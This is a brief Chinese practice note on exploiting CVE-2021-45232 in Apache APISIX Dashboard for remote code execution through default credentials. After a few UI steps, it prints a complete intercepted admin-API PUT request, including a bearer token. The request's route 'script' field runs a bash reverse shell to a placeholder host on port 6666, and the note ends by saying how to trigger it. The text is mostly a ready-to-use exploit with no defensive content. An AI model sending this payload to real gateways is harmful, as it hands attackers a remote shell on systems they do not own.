CVE-2021-45232未授权接口练习笔记

CVE-2021-45232 是 Apache APISIX Dashboard 中的一个严重权限漏洞，类似于攻击者无需密码即可拿到整个网关系统的“万能钥匙”。攻击者利用此漏洞，可直接操控网关流量转发规则，甚至远程执行代码，引发服务器沦陷。

默认账户密码导致RCE

1.进入页面

2.先创建任意名称的上游服务

3.点击路由，添加新路由，选择上面创建的上游

4.点击创建的路由，查看修改配置添加反弹shell

5.抓包修改

PUT /apisix/admin/routes/559321412762862275 HTTP/1.1
Host: xx.xx.xx.xx:9003
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: application/json
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://xx.xx.xx.xx:9003/routes/list
Content-Type: application/json;charset=UTF-8
Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3NDI5MTMzMTQsImlhdCI6MTc0MjkwOTcxNCwic3ViIjoiYWRtaW4ifQ.SrI6Edp4UVkvUCKN5k_3STwzQ1zK100rHh8g67kTaZs
Content-Length: 235
Origin: http://xx.xx.xx.xx:9003
Connection: close


{"uri":"/*","name":"rce","methods":["GET","POST","PUT","DELETE","PATCH","HEAD","OPTIONS","CONNECT","TRACE",],"script":"os.execute('/bin/bash -i >& /dev/tcp/xx.xx.xx.xx/6666 0>&1')","upstream_id":"559320696761615043","status":1}

发送后在页面拼接/rec即可